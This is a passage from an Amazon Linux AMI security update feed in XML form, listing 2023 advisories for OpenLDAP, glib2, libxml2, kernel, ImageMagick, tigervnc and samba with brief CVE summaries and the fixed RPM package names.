A flaw was discovered in ldap_X509dn2bv in OpenLDAP before 2.4.57 leading to a slapd crash in the X.509 DN parsing in ad_keystring, resulting in denial of service.
CVE-2020-36228:
An integer underflow was discovered in OpenLDAP before 2.4.57 leading to a slapd crash in the Certificate List Exact Assertion processing, resulting in denial of service.
CVE-2020-36227:
A flaw was discovered in OpenLDAP before 2.4.57 leading to an infinite loop in slapd with the cancel_extop Cancel operation, resulting in denial of service.
CVE-2020-36226:
A flaw was discovered in OpenLDAP before 2.4.57 leading to a memch->bv_len miscalculation and slapd crash in the saslAuthzTo processing, resulting in denial of service.
CVE-2020-36225:
A flaw was discovered in OpenLDAP before 2.4.57 leading to a double free and slapd crash in the saslAuthzTo processing, resulting in denial of service.
CVE-2020-36224:
A flaw was discovered in OpenLDAP before 2.4.57 leading to an invalid pointer free and slapd crash in the saslAuthzTo processing, resulting in denial of service.
CVE-2020-36223:
A flaw was discovered in OpenLDAP before 2.4.57 leading to a slapd crash in the Values Return Filter control handling, resulting in denial of service (double free and out-of-bounds read).
CVE-2020-36222:
A flaw was discovered in OpenLDAP before 2.4.57 leading to an assertion failure in slapd in the saslAuthzTo validation, resulting in denial of service.
CVE-2020-36221:
An integer underflow was discovered in OpenLDAP before 2.4.57 leading to slapd crashes in the Certificate Exact Assertion processing, resulting in denial of service (schema_init.c serialNumberAndIssuerCheck).
CVE-2019-13565:
An issue was discovered in OpenLDAP 2.x before 2.4.48. When using SASL authentication and session encryption, and relying on the SASL security layers in slapd access controls, it is possible to obtain access that would otherwise be denied via a simple bind for any identity covered in those ACLs. After the first SASL bind is completed, the sasl_ssf value is retained for all new non-SASL connections. Depending on the ACL configuration, this can affect different types of operations (searches, modifications, etc.). In other words, a successful authorization step completed by one user affects the authorization requirement for a different user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13565" title="" id="CVE-2019-13565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36221" title="" id="CVE-2020-36221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36222" title="" id="CVE-2020-36222" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36223" title="" id="CVE-2020-36223" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36224" title="" id="CVE-2020-36224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36225" title="" id="CVE-2020-36225" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36226" title="" id="CVE-2020-36226" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36227" title="" id="CVE-2020-36227" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36228" title="" id="CVE-2020-36228" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36229" title="" id="CVE-2020-36229" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36230" title="" id="CVE-2020-36230" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27212" title="" id="CVE-2021-27212" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap" version="2.4.40" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-servers" version="2.4.40" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="16.36.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/openldap-devel-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.40" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.40-16.36.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.40-16.36.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.40-16.36.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.40-16.36.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.40-16.36.amzn1.i686.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.40-16.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1742</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1742: important priority package update for 
glib2</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-25180:
The upstream bug report describes this issue as follows:
A vulnerability was found in GLib2.0, where a DoS is caused by handling a malicious text-form variant which is structured to cause looping superlinear to its text size. Applications are at risk if they parse untrusted text-form variants.
CVE-2023-24593:
The upstream bug report describes this issue as follows:
A vulnerability was found in GLib2.0, where a DoS is caused by handling a malicious text-form variant which is structured to cause looping superlinear to its text size. Applications are at risk if they parse untrusted text-form variants.
CVE-2021-3800:
A flaw was found in glib before version 2.63.6. Due to random charset alias, pkexec can leak content from files owned by privileged users to unprivileged ones under the right condition.
CVE-2021-28153:
An issue was discovered in GNOME GLib before 2.66.8. When g_file_replace() is used with G_FILE_CREATE_REPLACE_DESTINATION to replace a path that is a dangling symlink, it incorrectly also creates the target of the symlink as an empty file, which could conceivably have security relevance if the symlink is attacker-controlled. (If the path is a symlink to a file that already exists, then the contents of that file correctly remain unchanged.)
CVE-2019-13012:
The keyfile settings backend in GNOME GLib (aka glib2.0) before 2.60.0 creates directories using g_file_make_directory_with_parents (kfsb->dir, NULL, NULL) and files using g_file_replace_contents (kfsb->file, contents, length, NULL, FALSE, G_FILE_CREATE_REPLACE_DESTINATION, NULL, NULL, NULL). Consequently, it does not properly restrict directory (and file) permissions. Instead, for directories, 0777 permissions are used; for files, default file permissions are used. This is similar to CVE-2019-12450.
CVE-2018-16429:
GNOME GLib 2.56.1 has an out-of-bounds read vulnerability in g_markup_parse_context_parse() in gmarkup.c, related to utf8_str().
CVE-2018-16428:
In GNOME GLib 2.56.1, g_markup_parse_context_end_parse() in gmarkup.c has a NULL pointer dereference.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16428" title="" id="CVE-2018-16428" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16429" title="" id="CVE-2018-16429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13012" title="" id="CVE-2019-13012" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28153" title="" id="CVE-2021-28153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3800" title="" id="CVE-2021-3800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24593" title="" id="CVE-2023-24593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25180" title="" id="CVE-2023-25180" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2-debuginfo" version="2.36.3" release="5.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.23.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.23.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.23.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.23.amzn1.noarch.rpm</filename></package><package name="glib2" version="2.36.3" release="5.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.23.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.23.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.23.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.23.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" 
release="5.23.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.23.amzn1.i686.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.23.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.23.amzn1.i686.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.23.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1743</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1743: medium priority package update for libxml2</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-29469:
libxml2: Hashing of empty dict strings isn't deterministic. When hashing empty strings which aren't null-terminated, xmlDictComputeFastKey could produce inconsistent results. This could lead to various logic or memory errors, including double frees.
CVE-2023-28484:
A NULL pointer dereference exists when parsing (invalid) XML schemas in libxml2 xmlSchemaCheckCOSSTDerivedOK.
CVE-2022-40304:
An issue was discovered in libxml2 before 2.10.3. Certain invalid XML entity definitions can corrupt a hash table key, potentially leading to subsequent logic errors. In one case, a double-free can be provoked.
CVE-2022-40303:
An issue was discovered in libxml2 before 2.10.3. When parsing a multi-gigabyte XML document with the XML_PARSE_HUGE parser option enabled, several integer counters can overflow. This results in an attempt to access an array at a negative 2GB offset, typically leading to a segmentation fault.
CVE-2022-29824:
A flaw was found in the libxml2 library in functions used to manipulate the xmlBuf and the xmlBuffer types. A substantial input causes the values used to calculate buffer sizes to overflow, resulting in an out-of-bounds write.
CVE-2022-23308:
valid.c in libxml2 before 2.9.13 has a use-after-free of ID and IDREF attributes.
CVE-2021-3541:
A flaw was found in libxml2. An exponential entity expansion attack is possible, bypassing all existing protection mechanisms and leading to denial of service.
CVE-2021-3537:
A NULL pointer dereference flaw was found in libxml2, where it did not propagate errors while parsing XML mixed content. This flaw causes the application to crash if an untrusted XML document is parsed in recovery mode and post validated. The highest threat from this vulnerability is to system availability.
CVE-2021-3518:
There's a flaw in libxml2. An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.
CVE-2021-3517:
There is a flaw in the xml entity encoding functionality of libxml2. An attacker who is able to supply a crafted file to be processed by an application linked with the affected functionality of libxml2 could trigger an out-of-bounds read. The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.
CVE-2021-3516:
There's a flaw in libxml2's xmllint. An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability.
CVE-2020-24977:
GNOME project libxml2 v2.9.10 has a global buffer over-read vulnerability in xmlEncodeEntitiesInternal at libxml2/entities.c. The issue has been fixed in commit 50f06b3e.
CVE-2017-16931:
parser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16931" title="" id="CVE-2017-16931" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24977" title="" id="CVE-2020-24977" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3516" title="" id="CVE-2021-3516" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3517" title="" id="CVE-2021-3517" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3518" title="" id="CVE-2021-3518" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3537" title="" id="CVE-2021-3537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3541" title="" id="CVE-2021-3541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23308" title="" id="CVE-2022-23308" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29824" title="" id="CVE-2022-29824" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40303" title="" id="CVE-2022-40303" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40304" title="" id="CVE-2022-40304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28484" title="" id="CVE-2023-28484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29469" title="" id="CVE-2023-29469" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.42.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.6.42.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.6.42.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.42.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.6.42.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.6.42.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.6.42.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.42.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.6.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2023-1744</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1744: medium priority package update for kernel</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-31436:
qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.
CVE-2023-2513:
A use-after-free vulnerability was found in the Linux kernel's ext4 filesystem in the way it handled the extra inode size for extended attributes. This flaw could allow a privileged local user to cause a system crash or other undefined behaviors.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2513" title="" id="CVE-2023-2513" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31436" title="" id="CVE-2023-31436" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.314-164.533.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.314-164.533.amzn1.i686.rpm</filename></package><package name="perf" 
version="4.14.314" release="164.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.314-164.533.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1745</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1745: medium priority package update for ImageMagick</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1289:
A vulnerability was discovered in ImageMagick where a specially created SVG file loads itself and causes a segmentation fault. This flaw allows a remote attacker to pass a specially crafted SVG file that leads to a segmentation fault, generating many trash files in "/tmp," resulting in a denial of service. When ImageMagick crashes, it generates a lot of trash files. These trash files can be large if the SVG file contains many render actions. In a denial of service attack, if a remote attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. If an attacker uploads a 100M SVG, the server will generate about 10G.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289" title="" id="CVE-2023-1289" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-devel" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.25.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.25.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1746</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1746: important priority package update for tigervnc</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0494:
A vulnerability was found in X.Org. This issue occurs due to a dangling pointer in DeepCopyPointerClasses that can be exploited by ProcXkbSetDeviceInfo() and ProcXkbGetDeviceInfo() to read and write into freed memory. This can lead to local privilege elevation on systems where the X server runs privileged and remote code execution for ssh X forwarding sessions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0494" title="" id="CVE-2023-0494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc-debuginfo" version="1.8.0" release="21.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.8.0-21.35.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.8.0-21.35.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.8.0-21.35.amzn1.x86_64.rpm</filename></package><package name="tigervnc" version="1.8.0" release="21.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.8.0-21.35.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="21.35.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.8.0-21.35.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.8.0" release="21.35.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.8.0-21.35.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.35.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.8.0-21.35.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.35.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.8.0-21.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1747</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1747: important priority package update for samba</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 
20:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-38023:
Netlogon RPC Elevation of Privilege Vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38023" title="" id="CVE-2022-38023" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.16" release="24.66.amzn1" epoch="0" 
